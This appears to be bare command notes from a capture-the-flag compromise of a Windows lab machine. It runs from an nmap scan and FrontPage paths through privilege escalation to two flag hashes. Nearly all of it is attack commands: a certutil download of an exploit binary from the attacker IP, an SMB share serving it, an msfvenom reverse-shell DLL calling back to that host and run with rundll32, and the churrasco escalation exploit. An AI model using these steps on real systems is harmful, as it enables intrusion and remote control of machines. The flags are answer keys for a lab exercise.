nmap -A -p80 10.129.2.63
FPAuthorScriptUrl="_vti_bin/_vti_aut/author.dll"
FPAdminScriptUrl="_vti_bin/_vti_adm/admin.dll"
TPScriptUrl="_vti_bin/owssvr.dll"
windows-exploit-suggester.py
certutil -urlcache -f http://10.10.16.35/Taihou32.exe Taihou32.exe
impacket-smbserver meow .
copy \\10.10.16.35\meow\Taihou32.exe Taihou32.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.35 LPORT=7878 -f dll > s.dll
rundll32 s.dll
churrasco
700c5dc163014e22b3e408f8703f67d1
aa4beed1c0584445ab463a6747bd06e9